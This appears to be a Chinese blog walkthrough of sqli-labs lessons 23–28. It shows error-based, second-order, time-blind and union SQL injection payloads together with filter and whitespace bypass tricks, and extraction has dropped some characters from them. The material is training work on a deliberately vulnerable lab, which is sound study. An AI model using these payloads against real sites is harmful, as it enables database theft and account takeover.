建立免费个人网站,电子商务网站建设与管理考试题,怎样做企业网站建设,济宁 创意大厦 网站建设★★免责声明★★ 文章中涉及的程序(方法)可能带有攻击性#xff0c;仅供安全研究与学习之用#xff0c;读者将信息做其他用途#xff0c;由Ta承担全部法律及连带责任#xff0c;文章作者不承担任何法律及连带责任。 0、总体思路
先确认是否可以SQL注入#xff0c;使用单… ★★免责声明★★ 文章中涉及的程序(方法)可能带有攻击性仅供安全研究与学习之用读者将信息做其他用途由Ta承担全部法律及连带责任文章作者不承担任何法律及连带责任。 0、总体思路
先确认是否可以SQL注入使用单双引号,1/0,括号测试 ’ 1/0 )页面显示不同内容或响应长度来确定。存在SQL注入后则开始构造轮子进行验证猜出数据库用户名表名字段名有没有文件漏洞等。
为方便验证提交拦截到BP右击到Repeater修改参数值进行验证看响应内容。
特殊字符说明
表示空格
--表示注释1、Less-23
GET - Error based - strip comments
1.1、判断是否存在SQL注入
正常响应长度 输入带单引号’响 应长度有变化 1.2、报错函数
在测试过程中发现union 联合查询的方式一直报错尝试报错函数成功爆出。
报错函数extractvalue0x7e是~的ASCII码字符型后面有加单引号数字型没有根据报错函数获取到数据库名登录名。
# 输入内容
andextractvalue(1,concat(0x7e,(selectdatabase()),0x7e))1# 输出内容
XPATH syntax error: ~security~# 输入内容
andextractvalue(1,concat(0x7e,(selectuser()),0x7e))1# 输出内容
XPATH syntax error: ~rootlocalhost~2、Less-24
POST-Second order lnjections Real treat - stored lnjections
二次注入先注册一个账号带有注释功能的然后登录再修改密码
2.1、注册带注释功能的账号
账号admin#
密码1234562.2、用新账号登录
用新账号登录成功
2.3、修改密码
修改目标密码为123用账号admin密码123登录验证是否成功。
3、Less-25
GET - Error based - All your OR AND belong to us -string single quote
3.1、判断是否存在SQL注入
正常响应长度
输入带单引号’响 应长度有变化
3.2、报错函数
在测试过程中发现union 联合查询的方式没有达到预期值尝试报错函数成功爆出。
报错函数extractvalue()updatexml()没有达到预期值GTID_SUBSET()成功爆出。
# 输入内容
-GTID_SUBSET(database(),1)-# 输出内容
Malformed GTID set specification security.# 输入内容
-GTID_SUBSET(user(),1)-# 输出内容
Malformed GTID set specification rootlocalhost.4、Less-25a
GET - Blind Based - All your OR AND belong to us- lntiger based
4.1、判断是否存在SQL注入
正常响应长度
输入带单引号’响应长度有变化
4.2、借用BP爆破数据库
过滤 or and 关键字 采用重复的方式处理
oorr -- or anandd -- and
4.2.1、使用时间盲注验证
# 输入内容
ananddif(11,sleep(1),sleep(5))--4.2.2、爆破数据库长度
# 输入内容
ananddif(length(database())5,1,0)--在Repeater右击发送到Intruder先清除默认的标志位自己定位到数字5这个值任意填写的。Attack Type选择Cluster bomb,参数设置看截图说明。
4.2.3、爆破数据库名
# 输入内容
ananddif(substr(database(),1,1)a,1,0)--爆破参数设置看截图说明需要2个参数第一个是截取的数据库对应的字段索引第二个是匹配的内容。
5、Less-26
GET - Error based - All your SPACEs and COMMENTS belong to us
参考博客https://blog.csdn.net/m0_71299382/article/details/127944148
5.1、判断是否存在SQL注入
正常响应长度
输入带单引号’响 应长度有变化
5.2、关联查询
回显位在第2位
# 输入内容-数据库名
0%0bunion%0bselect%0b1,database(),3||11# 输入内容-登录名
0%0bunion%0bselect%0b1,user(),3||116、Less-27
GET - Error Based-All your UNION SELECT Belong to us - String - single quote
参考https://blog.csdn.net/qq_73393033/article/details/132106554
6.1、判断是否存在SQL注入
正常响应长度
输入带单引号’响 应长度有变化
6.2、报错函数
%26是的URL编码
# 输入内容
%26%26updatexml(1,concat(~,database(),~,user()),1)%26%2611# 输出内容
XPATH syntax error: ~security~rootlocalhost# 输入内容
%26%26extractvalue(1,concat(0x7e,(selectdatabase()),0x7e))1%26%2611# 输出内容
XPATH syntax error: ~security~7、Less-28
GET -Error Based- All your UNION SELECT Belong to us - String -Single quote with parenthesis
参考https://blog.csdn.net/m0_57736664/article/details/128553406
7.1、判断是否存在SQL注入
正常响应长度
输入带单引号’响 应长度有变化
7.2、确定回显字段
看源码参数闭合是),尝试验证是不是4个字段没有回显修改为了3时回显了因此可确定是3个字段
# 输入内容
)order%0Aby%0A4;%00# 页面没有预期回显数据# 修改为3
)order%0Aby%0A3;%007.3、关联查询
回显位在第2位
# 输入内容-数据库
0)union%0aunion%0aselectselect%0a1,database(),3||(1)(1# 输入内容-登录名
0)union%0aunion%0aselectselect%0a1,user(),3||(1)(18、下期内容预告
截止到目前SQL注入的内容已经分享了7篇后面会有一篇关于ByPass(绕过)和总结的内容。敬请关注我的公众号大象只为你持续更新中…